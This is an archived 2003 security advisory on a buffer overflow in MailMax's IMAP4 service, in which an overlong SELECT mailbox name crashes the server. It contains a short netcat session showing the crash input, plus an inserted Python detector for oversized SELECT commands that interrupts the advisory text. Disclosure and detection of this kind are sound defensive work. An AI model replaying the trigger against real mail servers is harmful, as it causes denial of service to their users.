[NT] Buffer Overflow Vulnerability found in MailMax (SELECT)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/18/03

    To: list@securiteam.com
    Date: 18 May 2003 11:11:00 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Buffer Overflow Vulnerability found in MailMax (SELECT)
    ------------------------------------------------------------------------

    SUMMARY

    MailMax <http://www.smartmax.com/> is "a scalable e-mail server that
    supports SMTP, IMAP4, and POP3 protocols". There is a buffer overflow
    vulnerability in its IMAP4 service (IMAP4rev1 SmartMax IMAPMax 5).
    Exploiting the vulnerability causes the service to stop responding.

    DETAILS

    Vulnerable systems:
     * IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.8)

    Immune systems:
     * IMAP4rev1 SmartMax IMAPMax 5.5

    When an attacker sends a large amount of data as the argument of the
    SELECT command, the buffer overflows.

    Example:
    nc infowarfare.dk 143
    * OK IMAP4rev1 SmartMax IMAPMax 5 Ready
    0000 CAPABILITY
    * CAPABILITY IMAP4rev1
    0000 OK CAPABILITY completed
    0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
    0001 OK User authenticated.
    0002 SELECT "aaa...[256]...aaaa"
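
For detection, the following is an added example (not part of the original advisory or the vendor's code) that scans client-to-server IMAP lines for SELECT commands whose mailbox name reaches the length shown above. The 256-character threshold is an assumption taken from the advisory's example, and the function names and sample lines are constructed for illustration.

```python
import re

# Assumption: the advisory's example uses a 256-character mailbox name, so
# names of that length or longer are flagged. Adjust the limit as needed.
MAX_MAILBOX_LEN = 256

# IMAP client command line: tag SP command SP arguments.
_SELECT = re.compile(rb"^(\S+) +SELECT +(.*)$", re.IGNORECASE)
_LITERAL = re.compile(rb"\{(\d+)\+?\}")  # {n} or non-synchronizing {n+}

def mailbox_length(arg: bytes) -> int:
    """Length of the mailbox name the server is asked to buffer."""
    lit = _LITERAL.fullmatch(arg)
    if lit:  # literal: the name follows on later lines, length is declared
        return int(lit.group(1))
    if not arg.startswith(b'"'):  # bare atom ends at the first space
        return len(arg.split(b" ")[0])
    n, i, body = 0, 0, arg[1:]
    while i < len(body) and body[i:i + 1] != b'"':
        if body[i:i + 1] == b"\\":  # \" and \\ each count as one character
            i += 1
        i += 1
        n += 1
    return n  # an unterminated quote still counts what was sent

def flag_select(line: bytes, limit: int = MAX_MAILBOX_LEN):
    """Return a finding dict for an oversized SELECT, else None."""
    m = _SELECT.match(line.rstrip(b"\r\n"))
    if not m:
        return None
    n = mailbox_length(m.group(2))
    if n < limit:
        return None
    return {"tag": m.group(1).decode("ascii", "replace"), "mailbox_len": n}

def scan(lines, limit: int = MAX_MAILBOX_LEN):
    """Run flag_select over an iterable of raw command lines."""
    return [hit for hit in (flag_select(l, limit) for l in lines) if hit]

# Constructed sample of client-to-server lines (not taken from the advisory).
SAMPLE = [
    b'0001 LOGIN "user@example.test" "x"\r\n',
    b'0002 SELECT "INBOX"\r\n',
    b'0003 select "' + b"a" * 256 + b'"\r\n',
    b"0004 SELECT {4096}\r\n",
    b"0005 SELECT " + b"b" * 300 + b"\r\n",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The literal form (`{4096}`) is checked by its declared length because the name itself arrives on a later line, so a check on line length alone would miss it.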

    Vendor response:
    The vendor has issued a fix (version 5.5) released by May 10th.

    Timeline:
    11/04/2003 Received an email from Mark Litchfield
    15/04/2003 Made an analysis and found the vulnerability
    28/04/2003 Reported the vulnerability to Vendor (support-at-smartmax.com)
    02/05/2003 Received response from Vendor
    17/05/2003 Public Disclosure.

    ADDITIONAL INFORMATION

    The vulnerability was discovered and reported by
    <mailto:Matrix at 0x36.org>.


    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

